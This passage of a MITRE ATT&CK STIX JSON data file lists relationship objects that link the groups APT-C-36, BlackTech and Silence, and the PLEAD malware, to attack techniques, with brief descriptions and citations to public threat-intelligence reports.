+ "created": "2020-05-05T18:53:08.295Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used ConfuserEx to obfuscate its variant of [Imminent Monitor](https://attack.mitre.org/software/S0434), compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7b4b8d0b-fbc3-469a-ab62-72c5c4c4653d",
+ "type": "relationship",
+ "modified": "2020-05-07T03:04:14.843Z",
+ "created": "2020-05-05T19:37:33.740Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used a macro function to set scheduled tasks, disguised as those used by Google.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aa5d5fcd-db19-4593-a958-b09853ceb372",
+ "type": "relationship",
+ "modified": "2020-05-06T18:42:54.351Z",
+ "created": "2020-05-05T19:37:33.765Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has prompted victims to accept macros in order to execute the subsequent payload.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--20599767-204a-4cbf-ada7-0f931ee925e4",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.769Z",
+ "created": "2020-05-05T19:37:33.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "tool--8f8cd191-902c-4e83-bf20-b57c8c4640e9",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3f010259-666c-403b-b5c7-603b319583da",
+ "type": "relationship",
+ "modified": "2020-05-05T19:37:33.785Z",
+ "created": "2020-05-05T19:37:33.785Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--c4d50cdf-87ce-407d-86d8-862883485842",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "QiAnXin APT-C-36 Feb2019",
+ "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/",
+ "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[APT-C-36](https://attack.mitre.org/groups/G0099) has used port 4050 for C2 communications.(Citation: QiAnXin APT-C-36 Feb2019)",
+ "relationship_type": "uses",
+ "id": "relationship--db0f9f05-6f76-47c3-81bf-a59d85045188",
+ "type": "relationship",
+ "modified": "2020-05-05T19:44:41.806Z",
+ "created": "2020-05-05T19:44:41.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--51cc3f41-f5aa-4d04-95de-15d96e103bac",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.062Z",
+ "created": "2020-05-05T20:54:53.062Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.",
+ "relationship_type": "uses",
+ "id": "relationship--66a14eeb-a6a0-4614-8224-7f238b3a83da",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.098Z",
+ "created": "2020-05-05T20:54:53.098Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8c5e20b3-b15c-4c08-84fe-eeacd9209375",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.104Z",
+ "created": "2020-05-05T20:54:53.104Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious links to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--036d9e28-e7c4-4865-b964-2ea213274521",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.107Z",
+ "created": "2020-05-05T20:54:53.107Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with links to cloud services to deliver malware.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--01455ab2-2769-4eab-9df2-e7e5f707e7c6",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.136Z",
+ "created": "2020-05-05T20:54:53.136Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with malicious documents to deliver malware.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--795b9ebc-6bf1-47f9-b236-117c2216c5d4",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.144Z",
+ "created": "2020-05-05T20:54:53.144Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[BlackTech](https://attack.mitre.org/groups/G0098) has used e-mails with malicious documents to lure victims into installing malware.(Citation: TrendMicro BlackTech June 2017)\t ",
+ "relationship_type": "uses",
+ "id": "relationship--f6d1c615-16df-4527-ad74-ce8623f87ce0",
+ "type": "relationship",
+ "modified": "2020-05-05T20:54:53.140Z",
+ "created": "2020-05-05T20:54:53.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "tool--d8d19e33-94fd-4aa3-b94a-08ee801a2153",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: Group IB Silence Sept 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--da331399-4c9f-4a16-92b1-97e635703c18",
+ "type": "relationship",
+ "modified": "2020-05-06T03:13:43.392Z",
+ "created": "2020-05-06T03:13:43.392Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "(Citation: Group IB Silence Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1567fbd3-5d2b-4040-a736-11f3d5e2139f",
+ "type": "relationship",
+ "modified": "2020-05-06T03:23:03.604Z",
+ "created": "2020-05-06T03:23:03.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
+ "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082",
+ "external_references": [
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used a valid certificate to sign their primary loader Silence.Downloader (aka TrueBot).(Citation: Group IB Silence Aug 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--908f1fa6-c797-47c3-bcb1-3438a9105095",
+ "type": "relationship",
+ "modified": "2020-05-06T03:32:07.175Z",
+ "created": "2020-05-06T03:32:07.175Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to proxy network communications.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--6e23cb4f-61dd-4a6a-8c25-7eb79c376558",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.753Z",
+ "created": "2020-05-06T15:26:38.753Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--f09f6c15-193c-406a-ab64-bf730d83f39f",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.799Z",
+ "created": "2020-05-06T15:26:38.799Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list open windows on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--e98a5dc7-707a-4933-801a-b98b2e44b309",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.825Z",
+ "created": "2020-05-06T15:26:38.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to upload and download files to and from an infected host.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--9020d567-103b-4dc2-b27d-115078ae2a76",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.829Z",
+ "created": "2020-05-06T15:26:38.829Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade",
+ "external_references": [
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) samples were found to be highly obfuscated with junk code.(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--8ee24ce1-0703-43dc-8b27-807747ca0209",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.839Z",
+ "created": "2020-05-06T15:26:38.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to execute shell commands on the compromised host.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--21711eb2-eddd-40f5-8c20-dc50495c102d",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.849Z",
+ "created": "2020-05-06T15:26:38.849Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to delete files on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--947a4837-cce1-48dd-b4e7-8d08d8dce663",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.855Z",
+ "created": "2020-05-06T15:26:38.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has used HTTP for communications with command and control (C2) servers.(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--213423ab-05cf-4354-9cea-d536686cf21d",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.863Z",
+ "created": "2020-05-06T15:26:38.863Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "external_references": [
+ {
+ "source_name": "ESET PLEAD Malware July 2018",
+ "url": "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "description": "Cherepanov, A.. (2018, July 9). Certificates stolen from Taiwanese tech\u2011companies misused in Plead malware campaign. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to steal saved passwords from Microsoft Outlook.(Citation: ESET PLEAD Malware July 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--5dd0d491-bb82-45b4-91cd-a7d9e4cf396e",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.870Z",
+ "created": "2020-05-06T15:26:38.870Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has been executed via malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--80389d5a-b92b-4101-930b-5be361e53eb8",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.952Z",
+ "created": "2020-05-06T15:26:38.952Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list drives and files on the compromised host.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--884019ca-fca8-46a8-8dc4-71f60427db0f",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.963Z",
+ "created": "2020-05-06T15:26:38.963Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) has the ability to list processes on the compromised host.(Citation: TrendMicro BlackTech June 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dd4da2e6-a54b-4420-9ed6-ebb3080bd2f8",
+ "type": "relationship",
+ "modified": "2020-05-06T15:26:38.958Z",
+ "created": "2020-05-06T15:26:38.958Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
